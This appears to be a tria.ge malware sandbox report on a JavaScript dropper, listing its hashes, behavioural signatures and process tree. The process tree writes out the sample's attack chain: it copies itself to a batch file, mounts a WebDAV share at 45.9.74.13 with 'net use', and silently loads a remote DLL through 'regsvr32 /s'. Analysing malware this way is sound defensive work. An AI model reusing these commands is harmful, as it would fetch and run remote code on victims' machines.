Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
164962732970732594.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
164962732970732594.js
Resource
win10v2004-20240709-en
General
-
Target
164962732970732594.js
-
Size
5KB
-
MD5
a6b2a59f6d83b8cc55113b7373909b77
-
SHA1
1dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
-
SHA256
90b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
-
SHA512
74279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0
-
SSDEEP
96:Bs9Kmsh6bskUzzFPiv+FRTQszC+FRTOIgisUj12uiDKIvXoEPkuEq:1Gfisu2bB/okkuz
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3324 wrote to memory of 2444 3324 wscript.exe 82 PID 3324 wrote to memory of 2444 3324 wscript.exe 82 PID 2444 wrote to memory of 3032 2444 cmd.exe 84 PID 2444 wrote to memory of 3032 2444 cmd.exe 84 PID 2444 wrote to memory of 4280 2444 cmd.exe 85 PID 2444 wrote to memory of 4280 2444 cmd.exe 85
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\164962732970732594.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\164962732970732594.js" "C:\Users\Admin\\vmmoin.bat" && "C:\Users\Admin\\vmmoin.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3032
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\115.dll3⤵PID:4280
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a6b2a59f6d83b8cc55113b7373909b77
SHA11dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
SHA25690b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
SHA51274279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0